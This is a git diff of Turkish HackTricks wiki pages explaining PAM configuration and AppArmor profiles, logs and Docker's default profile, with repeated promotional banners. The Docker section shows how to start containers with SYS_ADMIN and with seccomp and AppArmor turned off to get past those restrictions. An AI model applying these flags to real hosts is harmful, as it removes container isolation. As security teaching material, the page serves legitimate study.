* **💬 [Discord grubuna katılın](https://discord.gg/hRep4RUj7f)** veya [telegram grubuna katılın](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud github depolarına PR'lar göndererek paylaşın.**
</details>

View file

@ -1,28 +1,41 @@
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'ı **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** paylaşın.
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Temel Bilgiler
**PAM (Pluggable Authentication Modules)**, **bilgisayar hizmetlerine erişmeye çalışan kullanıcıların kimliklerini doğrulayan** ve çeşitli kriterlere dayanarak erişimlerini kontrol eden bir güvenlik mekanizması olarak görev yapar. Bu, yetkili kullanıcıların yalnızca belirli hizmetlerle etkileşime girebileceğini ve potansiyel olarak sistem aşırı yüklenmelerini önlemek için kullanımlarını sınırlayabileceğini sağlayan dijital bir kapıcıya benzer.
**PAM (Pluggable Authentication Modules)**, bilgisayar hizmetlerine erişmeye çalışan kullanıcıların kimliklerini **doğrulayan bir güvenlik mekanizması** olarak hareket eder ve erişimlerini çeşitli kriterlere göre kontrol eder. Belirli hizmetlerle sadece yetkili kullanıcıların etkileşimde bulunmasını sağlayarak, potansiyel olarak sistem aşırı yüklenmelerini önleyerek kullanımlarını sınırlar.
### Yapılandırma Dosyaları
- **Solaris ve UNIX tabanlı sistemler** genellikle `/etc/pam.conf` konumunda merkezi bir yapılandırma dosyası kullanır.
- **Linux sistemleri** ise hizmete özgü yapılandırmaları `/etc/pam.d` içindeki bir dizin yaklaşımını tercih eder. Örneğin, giriş hizmeti için yapılandırma dosyası `/etc/pam.d/login` konumunda bulunur.
- **Linux sistemleri** genellikle hizmete özgü yapılandırmaları `/etc/pam.d` içinde depolayarak dizin yaklaşımını tercih eder. Örneğin, giriş hizmeti için yapılandırma dosyası `/etc/pam.d/login` konumundadır.
Giriş hizmeti için bir PAM yapılandırma örneği şu şekilde olabilir:
Giriş hizmeti için bir PAM yapılandırma örneği şöyle olabilir:
```text
auth required /lib/security/pam_securetty.so
auth required /lib/security/pam_nologin.so
@ -39,38 +52,51 @@ session required /lib/security/pam_unix_session.so
Bu alanlar veya yönetim grupları, kimlik doğrulama ve oturum yönetimi sürecinin farklı yönlerinden sorumlu olan **auth**, **account**, **password** ve **session** içerir:
- **Auth**: Kullanıcının kimliğini doğrular, genellikle bir şifre isteyerek yapılır.
- **Account**: Hesap doğrulamasını yönetir, grup üyeliği veya günün belirli saatlerinde kısıtlamalar gibi koşulları kontrol eder.
- **Password**: Şifre güncellemelerini yönetir, karmaşıklık kontrolü veya sözlük saldırıları önleme gibi işlemleri içerir.
- **Session**: Hizmet oturumunun başlangıcında veya sonunda gerçekleştirilen işlemleri yönetir, örneğin dizinleri bağlama veya kaynak sınırlarını belirleme gibi.
- **Auth**: Genellikle bir şifre isteyerek kullanıcı kimliğini doğrular.
- **Account**: Hesap doğrulamasını ele alır, grup üyeliği veya günün saati gibi koşulları kontrol eder.
- **Password**: Şifre güncellemelerini yönetir, karmaşıklık kontrolleri veya sözlük saldırıları önlemlerini içerir.
- **Session**: Hizmet oturumunun başlangıcında veya sonunda işlemleri yönetir, örneğin dizinleri bağlama veya kaynak sınırlarını belirleme.
### **PAM Modül Kontrolleri**
Kontroller, modülün başarı veya başarısızlık durumunda verdiği yanıtı belirler ve genel kimlik doğrulama sürecini etkiler. Bunlar şunları içerir:
Kontroller, modülün başarılı veya başarısız durumuna yanıtını belirler ve genel kimlik doğrulama sürecini etkiler. Bunlar şunları içerir:
- **Required**: Gerekli bir modülün başarısız olması sonucunda sonunda başarısızlık oluşur, ancak tüm sonraki modüller kontrol edildikten sonra.
- **Requisite**: Başarısızlık durumunda işlem hemen sonlandırılır.
- **Sufficient**: Başarı durumunda aynı yönetim alanının geri kalan kontrolleri atlanır, ancak sonraki bir modül başarısız olursa başarısızlık oluşur.
- **Optional**: Yığında tek modül olduğunda sadece başarısızlığa neden olur.
- **Required**: Gerekli bir modülün başarısızlığı sonunda başarısızlıkla sonuçlanır, ancak tüm sonraki modüller kontrol edildikten sonra.
- **Requisite**: Başarısızlık durumunda işlemin hemen sonlandırılması.
- **Sufficient**: Başarı, aynı alanın geri kalan kontrol kontrollerini atlar, ancak bir sonraki modül başarısız olursa.
- **Optional**: Yığında tek modülse yalnızca başarısızlığa neden olur.
### Örnek Senaryo
Birden fazla auth modülü olan bir yapıda, işlem katı bir sırayı takip eder. `pam_securetty` modülü, giriş terminalinin yetkisiz olduğunu tespit ederse, root oturum açmaları engellenir, ancak tüm modüller "required" durumu nedeniyle işlenir. `pam_env` ortam değişkenlerini ayarlar ve kullanıcı deneyimine yardımcı olabilir. `pam_ldap` ve `pam_unix` modülleri birlikte kullanıcıyı kimlik doğrulamak için çalışır, `pam_unix` önceden sağlanan bir şifreyi kullanmaya çalışarak kimlik doğrulama yöntemlerinde verimlilik ve esneklik sağlar.
Birden fazla kimlik doğrulama modülü olan bir kurulumda, işlem katı bir sırayı takip eder. `pam_securetty` modülü giriş terminalinin yetkisiz olduğunu bulursa, kök girişleri engellenir, ancak tüm modüller "gerekli" durumu nedeniyle işlenmeye devam eder. `pam_env` ortam değişkenlerini ayarlar ve kullanıcı deneyimine yardımcı olabilir. `pam_ldap` ve `pam_unix` modülleri birlikte kullanıcıyı doğrular, `pam_unix` önceden sağlanan bir şifreyi kullanmaya çalışarak kimlik doğrulama yöntemlerinde verimlilik ve esneklik sağlar.
## Referanslar
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **stealer kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan bir **dark-web** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahraman olmak için AWS hackleme öğrenin<strong>!</strong></summary>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamınızı yapmak veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking hilelerinizi paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** katkıda bulunun.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
</details>

View file

@ -2,39 +2,53 @@
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan ileri seviyeye öğrenmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong> ile sıfırdan kahramana kadar AWS hacklemeyi öğrenin!</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklam vermek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna **PR göndererek** katkıda bulunun.
- **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
- [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
- [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
- **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'de **takip edin**.
- **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), **dark web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Temel Bilgiler
AppArmor, kullanıcılar yerine programlara doğrudan erişim kontrol özelliklerini bağlayarak, zorunlu erişim kontrolünü (MAC) etkin bir şekilde uygulayan, programlara sunulan kaynakları kısıtlamak için tasarlanmış bir **çekirdek geliştirmesidir**. Bu sistem, genellikle önyükleme sırasında, profilleri çekirdeğe yükleyerek çalışır ve bu profiller, bir programın erişebileceği kaynakları, ağ bağlantıları, ham soket erişimi ve dosya izinleri gibi belirler.
AppArmor, **programlara program profilleri aracılığıyla sunulan kaynakları kısıtlamayı amaçlayan bir çekirdek geliştirmesidir**, etkin bir şekilde Zorunlu Erişim Kontrolü (MAC) uygulayarak erişim kontrol özelliklerini doğrudan kullanıcılara bağlamak yerine programlara bağlar. Bu sistem, genellikle önyükleme sırasında profilleri çekirdeğe **yükleyerek çalışır** ve bu profiller, bir programın erişebileceği kaynakları belirler, örneğin ağ bağlantıları, ham soket erişimi ve dosya izinleri gibi.
AppArmor profilleri için iki işletim modu vardır:
- **Uygulama Modu**: Bu mod, profil içinde tanımlanan politikaları etkin bir şekilde uygular, bu politikalara aykırı olan eylemleri engeller ve syslog veya auditd gibi sistemler aracılığıyla bunları ihlal etmeye yönelik girişimleri kaydeder.
- **Şikayet Modu**: Uygulama modunun aksine, şikayet modu, profilin politikalarına aykırı olan eylemleri engellemez. Bunun yerine, bu girişimleri kısıtlamaları uygulamadan politika ihlalleri olarak kaydeder.
- **Uygulama Modu**: Bu mod, profilde tanımlanan politikaları aktif olarak uygular, bu politikalara aykırı hareketleri engeller ve syslog veya auditd gibi sistemler aracılığıyla bunları ihlal etmeye yönelik girişimleri kaydeder.
- **Şikayet Modu**: Uygulama modunun aksine, şikayet modu, profilin politikalarına aykırı hareketleri engellemez. Bunun yerine, bu girişimleri kısıtlamaları uygulamadan politika ihlalleri olarak kaydeder.
### AppArmor'ın Bileşenleri
- **Çekirdek Modülü**: Politikaların uygulanmasından sorumludur.
- **Politikalar**: Program davranışı ve kaynak erişimi için kuralları ve kısıtlamaları belirtir.
- **Ayrıştırıcı**: Politikaları çekirdeğe yükler, uygulama veya raporlama için.
- **Araçlar**: AppArmor ile etkileşimde bulunmak ve yönetmek için kullanıcı modu programlarıdır.
- **Ayrıştırıcı**: Politikaları çekirdeğe yükleme veya raporlama işlevini yerine getirir.
- **Araçlar**: AppArmor ile etkileşimde bulunmak ve yönetmek için bir arayüz sağlayan kullanıcı modu programlarıdır.
### Profil Yolu
AppArmor profilleri genellikle _**/etc/apparmor.d/**_ dizininde kaydedilir. `sudo aa-status` komutunu kullanarak, bazı profillerle kısıtlanan ikili dosyaları listeleyebilirsiniz. Listelenen her ikili dosyanın yolundaki "/" karakterini bir nokta ile değiştirirseniz, bahsedilen klasördeki apparmor profilinin adını elde edersiniz.
Apparmor profilleri genellikle _**/etc/apparmor.d/**_ klasöründe saklanır. `sudo aa-status` komutuyla kısıtlanan ikili dosyaları listeleyebilirsiniz. Listelenen her ikili dosyanın yolundaki "/" karakterini bir noktaya değiştirirseniz, bahsedilen klasördeki apparmor profilinin adını elde edersiniz.
Örneğin, _/usr/bin/man_ için bir **apparmor** profili, _/etc/apparmor.d/usr.bin.man_ konumunda bulunur.
Örneğin, _/usr/bin/man_ için bir **apparmor** profili _/etc/apparmor.d/usr.bin.man_ konumunda olacaktır.
### Komutlar
```bash
@ -48,40 +62,40 @@ aa-mergeprof #used to merge the policies
```
## Profil Oluşturma
* Etkilenen yürütülebilir dosyayı belirtmek için **mutlak yol ve joker karakterleri** (dosya eşleştirmesi için) kullanılabilir.
* **Dosyalar** üzerinde yürütülecek işlemleri belirtmek için aşağıdaki **erişim kontrolleri** kullanılabilir:
* **r** (okuma)
* **w** (yazma)
* **m** (belleğe haritalama, yürütülebilir olarak)
* **k** (dosya kilitleme)
* **l** (sabit bağlantı oluşturma)
* **ix** (yeni programın politikayı devralarak başka bir programı yürütmesi için)
* **Px** (ortamı temizledikten sonra başka bir profil altında yürütme)
* **Cx** (ortamı temizledikten sonra bir alt profil altında yürütme)
* **Ux** (ortamı temizledikten sonra sınırsız olarak yürütme)
* **Profillerde değişkenler** tanımlanabilir ve profilden dışarıdan manipüle edilebilir. Örneğin: @{PROC} ve @{HOME} (profil dosyasına #include \<tunables/global> ekleyin)
* **İzin verme kuralları, izin verme kurallarını geçersiz kılmak için kullanılabilir**.
- Etkilenen yürütülebilir dosyayı belirtmek için **mutlak yol ve joker karakterleri** (dosya globbing için) kullanılabilir.
- **Dosyalar** üzerinde yürütülecek erişimi belirtmek için aşağıdaki **erişim kontrolleri** kullanılabilir:
- **r** (okuma)
- **w** (yazma)
- **m** (bellek haritası olarak yürütme)
- **k** (dosya kilitleme)
- **l** (sert bağlantı oluşturma)
- **ix** (yeni programın politikayı devralarak başka bir programı yürütmesi)
- **Px** (ortamı temizledikten sonra başka bir profil altında yürütme)
- **Cx** (ortamı temizledikten sonra başka bir alt profil altında yürütme)
- **Ux** (ortamı temizledikten sonra kısıtlamasız yürütme)
- **Değişkenler** profillerde tanımlanabilir ve profilden dışarıdan manipüle edilebilir. Örneğin: @{PROC} ve @{HOME} (profil dosyasına #include \<tunables/global> ekleyin)
- **İzin verme kurallarını geçersiz kılmak için reddetme kuralları desteklenir**.
### aa-genprof
Profil oluşturmaya kolayca başlamak için apparmor size yardımcı olabilir. **Apparmor, bir ikili tarafından gerçekleştirilen eylemleri incelemesini ve ardından hangi eylemleri izin vermek veya reddetmek istediğinizi belirlemenizi sağlayabilir**.\
Profil oluşturmaya başlamak için apparmor size yardımcı olabilir. **Apparmor'un bir binary tarafından gerçekleştirilen eylemleri incelemesine ve ardından hangi eylemleri izin vermek veya reddetmek istediğinize karar vermenize izin vermesi mümkündür**.\
Sadece şunu çalıştırmanız yeterlidir:
```bash
sudo aa-genprof /path/to/binary
```
Ardından, farklı bir konsolda, genellikle ikili dosyanın gerçekleştireceği tüm eylemleri gerçekleştirin:
Ardından, farklı bir konsolda genellikle ikili dosyanın gerçekleştireceği tüm eylemleri gerçekleştirin:
```bash
/path/to/binary -a dosomething
```
Ardından, ilk konsolda "**s**" tuşuna basın ve kaydedilen eylemlerde yoksaymak, izin vermek veya başka bir şey yapmak istediğinizi belirtin. İşiniz bittiğinde "**f**" tuşuna basın ve yeni profil _/etc/apparmor.d/path.to.binary_ dizininde oluşturulacaktır.
Ardından, ilk konsolda "**s**" tuşuna basın ve kaydedilen eylemlerde ihmal etmek, izin vermek veya ne yapmak istediğinizi belirtin. İşiniz bittiğinde "**f**" tuşuna basın ve yeni profil _/etc/apparmor.d/path.to.binary_ dizininde oluşturulacaktır.
{% hint style="info" %}
Yukarı/aşağı ok tuşlarını kullanarak izin vermek/engellemek/istenen seçeneği seçebilirsiniz.
Yön tuşları kullanarak izin vermek/engellemek/ne yapmak istediğinizi seçebilirsiniz.
{% endhint %}
### aa-easyprof
Ayrıca, bir ikili dosyanın apparmor profilinin bir şablonunu da oluşturabilirsiniz:
Ayrıca bir uygulamanın apparmor profil şablonunu şu şekilde oluşturabilirsiniz:
```bash
sudo aa-easyprof /path/to/binary
# vim:syntax=apparmor
@ -107,90 +121,24 @@ sudo aa-easyprof /path/to/binary
}
```
{% hint style="info" %}
Varsayılan olarak, oluşturulan bir profilde hiçbir şey izin verilmez, bu yüzden her şey reddedilir. Örneğin, `/etc/passwd r,` gibi satırlar eklemek için `/etc/passwd` dosyasını okumaya izin vermek için eklemeler yapmanız gerekecektir.
Varsayılan olarak oluşturulan bir profilde hiçbir şey izin verilmez, bu nedenle her şey reddedilir. Örneğin, örneğin `/etc/passwd r,` gibi satırlar eklemeniz gerekecektir.
{% endhint %}
Yeni profili ardından **zorlayabilirsiniz**.
Yeni profili ardından şu şekilde **zorlayabilirsiniz**:
```bash
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
```
### Günlüklerden bir profil değiştirme
Aşağıdaki araç, günlükleri okuyacak ve kullanıcıya tespit edilen yasaklanmış eylemlerin bazılarını izin vermek isteyip istemediğini soracaktır:
Aşağıdaki araç, günlükleri okuyacak ve kullanıcıya tespit edilen yasaklanmış bazı eylemleri izin verip vermek istemediğini soracaktır:
```bash
sudo aa-logprof
```
{% hint style="info" %}
Ok tuşları kullanarak neyi izin vermek/engellemek/neyi yapmak istediğinizi seçebilirsiniz.
Ok tuşları kullanarak neyi izin vermek/engellemek/neyi olursa olsun seçebilirsiniz
{% endhint %}
### Bir Profili Yönetmek
```bash
# Create a new profile
sudo aa-genprof /path/to/binary
# Load a profile
sudo apparmor_parser -r -W /etc/apparmor.d/profile
# Unload a profile
sudo apparmor_parser -R /etc/apparmor.d/profile
# Disable a profile
sudo ln -s /etc/apparmor.d/profile /etc/apparmor.d/disable/
# Enable a profile
sudo ln -s /etc/apparmor.d/profile /etc/apparmor.d/enable/
# Check the status of a profile
sudo apparmor_status
```
### Profile Syntax
Profiles are written in a specific syntax. Here is an example of a simple profile:
```bash
#include <tunables/global>
/usr/bin/myapp {
# Deny access to all files
deny /**,
# Allow read access to /etc/passwd
/etc/passwd r,
# Allow write access to /tmp
/tmp w,
# Allow execute access to /usr/bin/myapp
/usr/bin/myapp x,
}
```
In this example, the profile denies access to all files except for `/etc/passwd`, `/tmp`, and `/usr/bin/myapp`. The `r`, `w`, and `x` indicate read, write, and execute permissions, respectively.
### Profile Inheritance
Profiles can also inherit from other profiles. This allows for the reuse of common rules and simplifies profile management. Here is an example of a profile that inherits from another profile:
```bash
#include <tunables/global>
/usr/bin/myapp {
# Inherit from the base profile
profile /usr/bin/myapp flags=(attach_disconnected,mediate_deleted) {
# Additional rules specific to /usr/bin/myapp
/var/log/myapp.log w,
}
}
```
In this example, the profile for `/usr/bin/myapp` inherits from the base profile and adds an additional rule for write access to `/var/log/myapp.log`.
### Conclusion
AppArmor provides a powerful and flexible way to enforce security policies on Linux systems. By creating and managing profiles, you can control the access and permissions of individual applications, reducing the risk of privilege escalation and unauthorized access.
### Profil Yönetimi
```bash
#Main profile management commands
apparmor_parser -a /etc/apparmor.d/profile.name #Load a new profile in enforce mode
@ -200,12 +148,12 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
```
## Günlükler
**`service_bin`** adlı yürütülebilir dosyanın _/var/log/audit/audit.log_ dosyasındaki **AUDIT** ve **DENIED** günlüklerinin örneği:
**`service_bin`** yürütülebilir dosyasının _/var/log/audit/audit.log_ dosyasındaki **AUDIT** ve **DENIED** günlük örneği:
```bash
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
```
Bu bilgilere şu şekilde de ulaşabilirsiniz:
Aşağıdaki bilgilere şu şekilde de ulaşabilirsiniz:
```bash
sudo aa-notify -s 1 -v
Profile: /bin/service_bin
@ -225,7 +173,7 @@ For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
```
## Docker'da Apparmor
Docker'ın varsayılan olarak yüklenen **docker-profile** profiline dikkat edin:
Docker'ın **docker-profile** profili varsayılan olarak nasıl yüklendiğine dikkat edin:
```bash
sudo aa-status
apparmor module is loaded.
@ -241,23 +189,23 @@ apparmor module is loaded.
/usr/lib/connman/scripts/dhclient-script
docker-default
```
Varsayılan olarak **Apparmor docker-default profili**, [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) adresinden oluşturulur.
Varsayılan olarak **Apparmor docker-default profil**'ü [https://github.com/moby/moby/tree/master/profiles/apparmor](https://github.com/moby/moby/tree/master/profiles/apparmor) adresinden oluşturulur.
**docker-default profil Özeti**:
* Tüm **ağ erişimine** izin verilir.
* **Hiçbir yetenek** tanımlanmamıştır (Ancak, bazı yetenekler temel kuralların içe aktarılmasıyla gelecektir, örneğin #include \<abstractions/base> )
* **/proc** dosyalarına yazma izni **verilmemiştir**
* Diğer **alt dizinler**/**dosyalar** /**proc** ve /**sys** dizinlerinde okuma/yazma/kilit/ilişkilendirme/çalıştırma erişimi **reddedilmiştir**
* **Mount** izni **verilmemiştir**
* **Ptrace**, yalnızca aynı apparmor profiliyle sınırlanmış bir işlemde çalıştırılabilir
- Tüm **ağ erişimine** sahiptir
- **Yetenek** tanımlanmamıştır (Ancak, bazı yetenekler temel kural dosyalarını içererek gelecektir, yani #include \<abstractions/base> )
- Herhangi bir **/proc** dosyasına **yazma izni yoktur**
- Diğer /**proc** ve /**sys** alt dizinleri/**dosyaları** okuma/yazma/kilitleme/bağlantı/çalıştırma erişimine **izin verilmez**
- **Bağlama** izni yoktur
- **Ptrace** yalnızca **aynı apparmor profiline** sıkıştırılmış bir işlemde çalıştırılabilir
Bir docker konteyneri çalıştırdığınızda aşağıdaki çıktıyı görmelisiniz:
Bir **docker konteyneri çalıştırdıktan** sonra aşağıdaki çıktıyı görmelisiniz:
```bash
1 processes are in enforce mode.
docker-default (825)
```
**Not:** Apparmor, varsayılan olarak konteynere verilen yetenek ayrıcalıklarını bile engelleyecektir. Örneğin, SYS_ADMIN yeteneği verilse bile, /proc içine yazma iznini engelleyebilecektir çünkü varsayılan olarak docker apparmor profili bu erişimi reddeder:
Dikkat edin ki **apparmor, varsayılan olarak konteynıra verilen yetenek ayrıcalıklarını bile engelleyecektir**. Örneğin, **SYS\_ADMIN yeteneği verilmiş olsa bile /proc içine yazma iznini engelleyebilecektir** çünkü varsayılan olarak docker apparmor profili bu erişimi reddeder:
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
echo "" > /proc/stat
@ -267,27 +215,27 @@ Apparmor kısıtlamalarını atlamak için **apparmor'u devre dışı bırakman
```bash
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
```
Not: Varsayılan olarak **AppArmor**, SYS\_ADMIN yeteneğiyle bile içeriden klasörleri bağlamayı **yasaklar**.
Varsayılan olarak **AppArmor**, **konteynerin içinden klasör bağlamasını yasaklayacaktır** bile SYS\_ADMIN yeteneği ile.
Not: Docker konteynerine **yetenekler** ekleyebilir/çıkarabilirsiniz (bu, **AppArmor** ve **Seccomp** gibi koruma yöntemleri tarafından hala kısıtlanır):
Docker konteynerine **yetenekler ekleyebilir/çıkarabilirsiniz** (bu hala **AppArmor** ve **Seccomp** gibi koruma yöntemleri tarafından kısıtlanacaktır):
* `--cap-add=SYS_ADMIN` SYS\_ADMIN yeteneği verir
* `--cap-add=SYS_ADMIN` `SYS_ADMIN` yeteneği verir
* `--cap-add=ALL` tüm yetenekleri verir
* `--cap-drop=ALL --cap-add=SYS_PTRACE` tüm yetenekleri kaldırır ve sadece `SYS_PTRACE` yeteneğini verir
{% hint style="info" %}
Genellikle, bir **docker** konteyneri **içinde** bir **ayrıcalıklı yetenek** olduğunu **fark ettiğinizde** ancak **saldırının bazı kısımlarının çalışmadığını** görürseniz, bunun nedeni docker **apparmor'ın bunu engellemesidir**.
Genellikle, bir **docker** konteyneri **içinde** bir **açık yeteneğin** bulunduğunu **fark ettiğinizde** ve **açığın bazı kısımlarının çalışmadığını gördüğünüzde**, bunun nedeni docker **apparmor'ın bunu engelliyor olması** olacaktır.
{% endhint %}
### Örnek
([**buradan**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) alınan örnek)
(Örnek [**buradan**](https://sreeninet.wordpress.com/2016/03/06/docker-security-part-2docker-engine/) alınmıştır)
AppArmor işlevselliğini göstermek için aşağıdaki satırı içeren yeni bir Docker profilü "mydocker" oluşturdum:
AppArmor işlevselliğini göstermek için, aşağıdaki satırı eklediğim yeni bir Docker profilı olan "mydocker"ı oluşturdum:
```
deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
```
